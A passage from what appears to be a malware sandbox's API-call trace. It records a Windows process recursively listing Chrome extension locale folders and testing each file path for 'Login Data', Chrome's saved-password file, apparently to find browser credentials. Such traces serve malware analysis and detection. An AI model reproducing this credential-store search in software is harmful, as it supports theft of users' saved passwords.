ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.753] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.753] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.753] GetProcessHeap () returned 0x8e0000 [0161.754] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.754] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.754] GetProcessHeap () returned 0x8e0000 [0161.754] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.754] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86644070, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86644070, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86644070, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="pt_BR", cAlternateFileName="")) returned 1 [0161.754] lstrcmpiW (lpString1="pt_BR", lpString2=".") returned 1 [0161.754] lstrcmpiW (lpString1="pt_BR", lpString2="..") returned 1 [0161.754] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.754] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.754] lstrlenW (lpString="\\") returned 1 [0161.754] GetProcessHeap () returned 0x8e0000 [0161.754] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.754] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.754] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.754] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.754] lstrlenW (lpString="pt_BR") returned 5 [0161.754] GetProcessHeap () returned 0x8e0000 [0161.754] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925dd8 [0161.754] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.754] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR" [0161.754] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.754] GetProcessHeap () returned 0x8e0000 [0161.754] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.754] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR") returned 140 [0161.754] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR") returned 140 [0161.754] lstrlenW (lpString="\\*.*") returned 4 [0161.754] GetProcessHeap () returned 0x8e0000 [0161.754] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x91a0a8 [0161.754] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR" [0161.754] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\*.*" [0161.754] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86644070, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86644070, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86644070, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.755] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.755] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86644070, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86644070, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86644070, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.755] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.755] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.755] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86644070, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86644070, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.755] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR") returned 140 [0161.755] lstrlenW (lpString="\\") returned 1 [0161.755] GetProcessHeap () returned 0x8e0000 [0161.755] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91b1e0 [0161.755] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR" [0161.755] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\" [0161.755] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\") returned 141 [0161.755] lstrlenW (lpString="messages.json") returned 13 [0161.755] GetProcessHeap () returned 0x8e0000 [0161.755] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x136) returned 0x91b308 [0161.755] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\" [0161.755] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" [0161.755] VirtualQuery (in: lpAddress=0x91b1e0, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.755] GetProcessHeap () returned 0x8e0000 [0161.755] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1e0 | out: hHeap=0x8e0000) returned 1 [0161.755] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json", lpSrch="Login Data") returned 0x0 [0161.755] VirtualQuery (in: lpAddress=0x91b308, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.755] GetProcessHeap () returned 0x8e0000 [0161.755] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b308 | out: hHeap=0x8e0000) returned 1 [0161.755] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86644070, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86644070, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.755] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.756] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.756] GetProcessHeap () returned 0x8e0000 [0161.756] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.756] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.756] GetProcessHeap () returned 0x8e0000 [0161.756] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.756] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86644070, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86644070, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86644070, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="pt_PT", cAlternateFileName="")) returned 1 [0161.756] lstrcmpiW (lpString1="pt_PT", lpString2=".") returned 1 [0161.756] lstrcmpiW (lpString1="pt_PT", lpString2="..") returned 1 [0161.756] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.756] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.756] lstrlenW (lpString="\\") returned 1 [0161.756] GetProcessHeap () returned 0x8e0000 [0161.756] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.756] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.756] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.756] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.756] lstrlenW (lpString="pt_PT") returned 5 [0161.756] GetProcessHeap () returned 0x8e0000 [0161.756] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925dd8 [0161.756] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.756] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT" [0161.756] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.756] GetProcessHeap () returned 0x8e0000 [0161.756] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.756] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT") returned 140 [0161.756] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT") returned 140 [0161.756] lstrlenW (lpString="\\*.*") returned 4 [0161.756] GetProcessHeap () returned 0x8e0000 [0161.756] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x91a0a8 [0161.756] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT" [0161.756] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\*.*" [0161.756] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86644070, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86644070, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86644070, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.757] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.757] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86644070, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86644070, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86644070, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.757] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.758] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.758] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86644070, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86644070, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.758] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT") returned 140 [0161.758] lstrlenW (lpString="\\") returned 1 [0161.758] GetProcessHeap () returned 0x8e0000 [0161.758] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91b1e0 [0161.758] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT" [0161.758] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\" [0161.758] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\") returned 141 [0161.758] lstrlenW (lpString="messages.json") returned 13 [0161.758] GetProcessHeap () returned 0x8e0000 [0161.758] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x136) returned 0x91b308 [0161.758] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\" [0161.758] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS 